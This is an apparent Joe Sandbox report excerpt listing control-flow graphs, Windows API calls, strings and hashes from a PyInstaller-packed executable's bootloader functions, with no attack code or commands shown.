                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 398 7ff6fb1e11f0-7ff6fb1e124d call 7ff6fb1eb0a0 401 7ff6fb1e124f-7ff6fb1e1276 call 7ff6fb1e25f0 398->401 402 7ff6fb1e1277-7ff6fb1e128f call 7ff6fb1f4170 398->402 407 7ff6fb1e1291-7ff6fb1e12a8 call 7ff6fb1e2760 402->407 408 7ff6fb1e12ad-7ff6fb1e12bd call 7ff6fb1f4170 402->408 413 7ff6fb1e1409-7ff6fb1e141e call 7ff6fb1ead80 call 7ff6fb1f415c * 2 407->413 414 7ff6fb1e12bf-7ff6fb1e12d6 call 7ff6fb1e2760 408->414 415 7ff6fb1e12db-7ff6fb1e12ed 408->415 430 7ff6fb1e1423-7ff6fb1e143d 413->430 414->413 417 7ff6fb1e12f0-7ff6fb1e1315 call 7ff6fb1ef6bc 415->417 424 7ff6fb1e1401 417->424 425 7ff6fb1e131b-7ff6fb1e1325 call 7ff6fb1ef430 417->425 424->413 425->424 431 7ff6fb1e132b-7ff6fb1e1337 425->431 432 7ff6fb1e1340-7ff6fb1e1368 call 7ff6fb1e94e0 431->432 435 7ff6fb1e136a-7ff6fb1e136d 432->435 436 7ff6fb1e13e6-7ff6fb1e13fc call 7ff6fb1e25f0 432->436 437 7ff6fb1e136f-7ff6fb1e1379 435->437 438 7ff6fb1e13e1 435->438 436->424 440 7ff6fb1e13a4-7ff6fb1e13a7 437->440 441 7ff6fb1e137b-7ff6fb1e1389 call 7ff6fb1efdfc 437->441 438->436 443 7ff6fb1e13ba-7ff6fb1e13bf 440->443 444 7ff6fb1e13a9-7ff6fb1e13b7 call 7ff6fb209140 440->444 447 7ff6fb1e138e-7ff6fb1e1391 441->447 443->432 446 7ff6fb1e13c5-7ff6fb1e13c8 443->446 444->443 449 7ff6fb1e13ca-7ff6fb1e13cd 446->449 450 7ff6fb1e13dc-7ff6fb1e13df 446->450 451 7ff6fb1e1393-7ff6fb1e139d call 7ff6fb1ef430 447->451 452 7ff6fb1e139f-7ff6fb1e13a2 447->452 449->436 453 7ff6fb1e13cf-7ff6fb1e13d7 449->453 450->424 451->443 451->452 452->436 453->417
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                              • API String ID: 2030045667-2813020118
                                                              • Opcode ID: 037f3093d73a47c1094b0f469115e0436c81e2300c38a90b229c8b60b32e4b09
                                                              • Instruction ID: f25522d03216c9f26ca48102f9033c5c81c35bf2f67cc895f3b0f9c312f4e899
                                                              • Opcode Fuzzy Hash: 037f3093d73a47c1094b0f469115e0436c81e2300c38a90b229c8b60b32e4b09
                                                              • Instruction Fuzzy Hash: BB519B62E0868381FB60EA16A8503BE6291BB89798F544135ED6EC7BE5FF3CF551C700

                                                              Control-flow Graph

                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6FB1FE3BA,?,?,-00000018,00007FF6FB1FA063,?,?,?,00007FF6FB1F9F5A,?,?,?,00007FF6FB1F524E), ref: 00007FF6FB1FE19C
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6FB1FE3BA,?,?,-00000018,00007FF6FB1FA063,?,?,?,00007FF6FB1F9F5A,?,?,?,00007FF6FB1F524E), ref: 00007FF6FB1FE1A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                              • Instruction ID: f91773464e4e3cebfd30156d09eb2faf33cdbfea43315af6720a273f4a939758
                                                              • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                              • Instruction Fuzzy Hash: D241CC22B19A0381EB26CB17A91467A2292BF8DBA8F084535DD2DD77E4FE3DE505C300

                                                              Control-flow Graph

                                                              APIs
                                                              • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF6FB1E3834), ref: 00007FF6FB1E7CE4
                                                              • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF6FB1E3834), ref: 00007FF6FB1E7D2C
                                                                • Part of subcall function 00007FF6FB1E7E10: GetEnvironmentVariableW.KERNEL32(00007FF6FB1E365F), ref: 00007FF6FB1E7E47
                                                                • Part of subcall function 00007FF6FB1E7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6FB1E7E69
                                                                • Part of subcall function 00007FF6FB1F7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB1F7561
                                                                • Part of subcall function 00007FF6FB1E26C0: MessageBoxW.USER32 ref: 00007FF6FB1E2736
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                              • API String ID: 740614611-1339014028
                                                              • Opcode ID: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
                                                              • Instruction ID: 3fab048a01c5c4017447e2a7546bf2296505fa9d9af4630f50572a24fffc5199
                                                              • Opcode Fuzzy Hash: e203fb9b2ed022230aea9b70073d79c64569b0fcacf7335b186391ffe1e7d089
                                                              • Instruction Fuzzy Hash: 1D411515E0A64380FB24EB61A9652B91291AF8DBC8F441131EE2DD7BF6FE2CF5088340

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: f46020de842a52cafdde7105f07d1b6eb91271a1123fdb72a25b984c7f5050ec
                                                              • Instruction ID: f5e055fceffc53f5b794d61c64e7a08555c6d169ef99cdab7ceb5876c17f195e
                                                              • Opcode Fuzzy Hash: f46020de842a52cafdde7105f07d1b6eb91271a1123fdb72a25b984c7f5050ec
                                                              • Instruction Fuzzy Hash: 85C1F226E1C68791EB61DB15A4403BE37A1FB98B88F550131DA6E877F1EE7CE855C300

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID:
                                                              • API String ID: 995526605-0
                                                              • Opcode ID: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
                                                              • Instruction ID: 9f68bda16038fa0af6870d5dab42bb87e4d3b2bb3bba1e13ac5367b6b9894744
                                                              • Opcode Fuzzy Hash: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
                                                              • Instruction Fuzzy Hash: 9D212125E0CA4341EB209B55F59427EA3A5EB897A8F140235EA7DC3AF4EF6CE4498700

                                                              Control-flow Graph

                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,00007FF6FB1E3534), ref: 00007FF6FB1E3411
                                                                • Part of subcall function 00007FF6FB1E29E0: GetLastError.KERNEL32(?,?,?,00007FF6FB1E342E,?,00007FF6FB1E3534), ref: 00007FF6FB1E2A14
                                                                • Part of subcall function 00007FF6FB1E29E0: FormatMessageW.KERNEL32(?,?,?,00007FF6FB1E342E), ref: 00007FF6FB1E2A7D
                                                                • Part of subcall function 00007FF6FB1E29E0: MessageBoxW.USER32 ref: 00007FF6FB1E2ACF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ErrorFileFormatLastModuleName
                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                              • API String ID: 517058245-2863816727
                                                              • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                              • Instruction ID: 1d8c0df6fd8a5ef8bde1ecc7c3af3fead7223a4fc5fc9a714621c32a0e5ca254
                                                              • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                              • Instruction Fuzzy Hash: 89213D61F1864391FB26EB24E9513BE5290AF4C398F801236E67DC69F5FE2CE5048710

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00007FF6FB1E7B50: GetCurrentProcess.KERNEL32 ref: 00007FF6FB1E7B70
                                                                • Part of subcall function 00007FF6FB1E7B50: OpenProcessToken.ADVAPI32 ref: 00007FF6FB1E7B83
                                                                • Part of subcall function 00007FF6FB1E7B50: GetTokenInformation.KERNELBASE ref: 00007FF6FB1E7BA8
                                                                • Part of subcall function 00007FF6FB1E7B50: GetLastError.KERNEL32 ref: 00007FF6FB1E7BB2
                                                                • Part of subcall function 00007FF6FB1E7B50: GetTokenInformation.KERNELBASE ref: 00007FF6FB1E7BF2
                                                                • Part of subcall function 00007FF6FB1E7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6FB1E7C0E
                                                                • Part of subcall function 00007FF6FB1E7B50: CloseHandle.KERNEL32 ref: 00007FF6FB1E7C26
                                                              • LocalFree.KERNEL32(?,00007FF6FB1E3814), ref: 00007FF6FB1E848C
                                                              • LocalFree.KERNEL32(?,00007FF6FB1E3814), ref: 00007FF6FB1E8495
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                              • API String ID: 6828938-1529539262
                                                              • Opcode ID: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                              • Instruction ID: 8bfa06a4851e46ac826007bb199eff448da766d6db3e1cf6c0b06b7998118862
                                                              • Opcode Fuzzy Hash: 66c7400c0f842d66862a6c7a5c7e226ffa5096460946b14aa4108adf3e2753a4
                                                              • Instruction Fuzzy Hash: 64212B21E0864381E710EB10E5253FE62A5FB8D784F845435EA6DC3BE6EE3CE545C790

                                                              Control-flow Graph

                                                              APIs
                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FB1FC25B), ref: 00007FF6FB1FC38C
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6FB1FC25B), ref: 00007FF6FB1FC417
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ConsoleErrorLastMode
                                                              • String ID:
                                                              • API String ID: 953036326-0
                                                              • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                              • Instruction ID: a7dbcbc1e1f74e19b309d2fcd1c6570bcd3f85d178627569dfc7b3fa630c83f6
                                                              • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                              • Instruction Fuzzy Hash: ED91AF72F1865385F760DB69A4502BD2BA0BB48B8CF144139DE2EE6EE5EE38D441D700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 1279662727-0
                                                              • Opcode ID: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                              • Instruction ID: 476057493f5560489294b66ecdfc4e74d91cd70a192fcd2b2411a668e4bec7d9
                                                              • Opcode Fuzzy Hash: ebea2a15e315379b7438f17c06ac6f564ef77e5ce815d722b4931623952d3bd6
                                                              • Instruction Fuzzy Hash: 29417122E1878343E754DB6195503796261FB9C7A8F109335E6AD83AE5FF6CA5F0C700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 3251591375-0
                                                              • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                              • Instruction ID: 1944ed0c782d6a72df424f5b4e2c204f17b496fee78f094ca1a0ba810387238b
                                                              • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                              • Instruction Fuzzy Hash: 2A311A25E0824381FB64EB6899653BD1281AF4978CF440034EA7ECBEF3FE2CB9448611
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                              • Instruction ID: 07a2989078018d28b20d309ff3bd37894c9438233e6348d44e1c110bbb6e1a0a
                                                              • Opcode Fuzzy Hash: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
                                                              • Instruction Fuzzy Hash: EBD06714F18607C6EB686B7059A917D12115F9CB85B102438D86BC63F3ED3CA8099350
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                              • Instruction ID: 1adbaf364a4a0024140f1d7681e4dac30bb370f42e2754074938bbb80f9a2542
                                                              • Opcode Fuzzy Hash: 9ca15b9002a87b72fd1966d073ee072d8ab2af6885046d3198ed673a4b76404c
                                                              • Instruction Fuzzy Hash: 7B518062E0968346FB28DE26940067E6791AF8CBACF184634DD7D86BF5EF3CE441C610
                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6FB1F9CE5,?,?,00000000,00007FF6FB1F9D9A), ref: 00007FF6FB1F9ED6
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB1F9CE5,?,?,00000000,00007FF6FB1F9D9A), ref: 00007FF6FB1F9EE0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseErrorFindLastNotification
                                                              • String ID:
                                                              • API String ID: 1687624791-0
                                                              • Opcode ID: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                              • Instruction ID: a6cc17002dc50e9e85a16ba20153214398180aab3176f7972fe484a0553a904e
                                                              • Opcode Fuzzy Hash: 65da2f67be20623dd6870cbeabcb199f1b77c363b63baf0d8a802715797da709
                                                              • Instruction Fuzzy Hash: 78215E21F1868341FB94E761A59437D26929F8CBE8F085235DA3EC76FAEE6CE445C300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                              • Instruction ID: 6fbc9857c4937a9933242a782e48884cf24c36f4a7c08b1976389c8317e457e7
                                                              • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                              • Instruction Fuzzy Hash: 1E11C465E18A8281DB20CB25A54417A6361AB48BF8F680331EE7E87BF9EE3CD050C700
                                                              APIs
                                                              • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                              • String ID:
                                                              • API String ID: 588628887-0
                                                              • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                              • Instruction ID: 51bb9e03f3e897eae2def5a8f91c3a9cbbd468c0c523b6bf9e85a288c7dd095d
                                                              • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                              • Instruction Fuzzy Hash: 65E08C10F0864342FF18EBF2A85807912A19F9C794B005030C92EC72F1FE2CA995C300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                               • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
